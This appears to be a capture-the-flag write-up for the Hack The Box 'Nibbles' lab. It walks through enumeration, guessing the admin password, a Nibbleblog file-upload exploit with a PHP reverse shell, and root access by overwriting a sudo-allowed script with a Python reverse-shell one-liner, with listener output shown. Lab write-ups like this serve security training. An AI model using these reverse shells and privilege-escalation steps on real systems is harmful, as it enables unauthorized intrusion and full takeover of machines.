Nibbles
This box is very straight forward and teaches hackers a way of enumerating and researching exploits that are available online.
Reconnaissance
# Nmap 7.91 scan initiated Sun Mar 14 00:25:31 2021 as: nmap -sC -sV -p22,80 -oN nibbles.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 14 00:25:42 2021 -- 1 IP address (1 host up) scanned in 11.03 secondsAfter running the nmap scan, go to the web browser and visit the server and review the page source.
Next step would be to visit the webpage directory as specified.
Found Login
After trying default credentials it did not work, it also has a lockout mechanism, which means you can get banned. Nothing much here, the password is nibbles and must go based on what you think a system administrator with poor practice would use. We'll proceed to finding a username with GoBuster.
Running GoBuster Scan
└─$ gobuster dir --url http://10.10.10.75/nibbleblog/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/03/14 18:23:03 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 2987]
/sitemap.php (Status: 200) [Size: 402]
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/feed.php (Status: 200) [Size: 302]
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php (Status: 200) [Size: 78]
/update.php (Status: 200) [Size: 1622]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]Found Username and Version
These were found while searching the GoBuster directories
Found Exploit
─$ searchsploit nibble
------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
------------------------------------------------------------------------------------- ---------------------------------More information on this exploit can be found here.
The exploit is straight forward, gain credentials, upload php reverse shell and execute.
Uploading Shell
Login to through the admin panel, the passowrd is nibbles as guessed and upload one of the following shells with your kali IP
re/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.phpThey should all suffice, so pick your poison.
Set up your listener and visit the following link.
┌──(kali㉿kali)-[~/HTB/Nibbles]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 52458
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
18:46:16 up 19 min, 0 users, load average: 0.00, 0.02, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibblerOnce your connection is established, check if you can create any files that you can run as another user.
nibbler@Nibbles:/home/nibbler$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
tching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.shCreate the following folders and file, along with python reverse code.
nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh
#!/bin/sh
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SO
CK_STREAM);s.connect(("10.10.10.75",7777));os.dup2(s.fileno(),0); os.dup2(s.file
no(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Set up your listener and execute the create script as sudo.
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo: unable to resolve host Nibbles: Connection timed outGetting ROOT
─$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 36800
# whoami
root
# ls
bakmonitor.sh
monitor.sh
test.py
# cd /root
# ls
root.txt
Last updated
Was this helpful?